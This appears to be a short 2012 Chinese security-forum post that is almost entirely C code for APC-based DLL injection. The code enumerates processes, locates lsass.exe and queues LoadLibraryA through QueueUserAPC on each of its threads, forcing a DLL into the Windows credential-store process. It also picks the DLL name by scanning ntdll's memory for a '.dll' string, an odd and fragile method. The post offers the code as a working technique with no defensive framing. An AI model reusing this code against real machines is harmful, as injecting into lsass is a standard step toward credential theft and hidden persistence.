-
-
[原创]今天突然想注入,写了点代码
-
发表于:
2012-4-3 15:13
8507
-
DWORD GetNtDllString(HANDLE dllbase)
{
char* lpbuf = (char*)dllbase;
while(stricmp(++lpbuf, ".dll") && lpbuf - (char*)dllbase < 65535);
printf("%s", lpbuf - 5);
return lpbuf - (char*)dllbase;
}
int main(int argc, char* argv[])
{
HINSTANCE ntdll_dll = GetModuleHandle("ntdll.dll");
NTQUERYSYSTEMINFORMATION ZwQuerySystemInformation;
PSYSTEM_PROCESSES pSp=NULL;
ULONG retureSize = 0;
DWORD status;
unsigned char *buf;
char * dll_name = (char*)ntdll_dll + GetNtDllString(ntdll_dll) - 3;
printf("CurrentThreadId %d\ninject dll name:%s\n",
GetCurrentThreadId(), dll_name);
ZwQuerySystemInformation = (NTQUERYSYSTEMINFORMATION)GetProcAddress(ntdll_dll, "ZwQuerySystemInformation");
status = ZwQuerySystemInformation(SystemProcessesAndThreadsInformation, NULL, 0, &retureSize);
if (status != STATUS_INFO_LENGTH_MISMATCH)
return -1;
buf = malloc(retureSize);
if (buf ==NULL)
return -1;
status = ZwQuerySystemInformation(SystemProcessesAndThreadsInformation, (PVOID)buf, retureSize, NULL);
if (status != STATUS_SUCCESS)
return -1;
pSp = (PSYSTEM_PROCESSES)buf;
do {
pSp = (PSYSTEM_PROCESSES)( (unsigned long)pSp + pSp->NextEntryDelta );
if (pSp->ProcessName.Buffer
&& _wcsicmp(pSp->ProcessName.Buffer, L"lsass.exe") == 0){
ULONG i;
for (i =0; i<pSp->ThreadCount; i++) {
HANDLE pthread;
pthread = OpenThread(THREAD_SET_CONTEXT, FALSE, (DWORD)pSp->Threads[i].ClientId.UniqueThread);
printf("进程 %d 线程:%d\r\n",
pSp->Threads[i].ClientId.UniqueProcess,
pSp->Threads[i].ClientId.UniqueThread);
if (!QueueUserAPC((PAPCFUNC)LoadLibraryA, pthread, (ULONG_PTR)dll_name))
printf("QueueUserAPC error\n");
CloseHandle(pthread);
}
break;
}
} while ( pSp->NextEntryDelta != 0 );
free(buf);
while (!kbhit())
SleepEx(100, TRUE);
return 0;
}
[培训]内核驱动高级班,冲击BAT一流互联网大厂工作,每周日13:00-18:00直播授课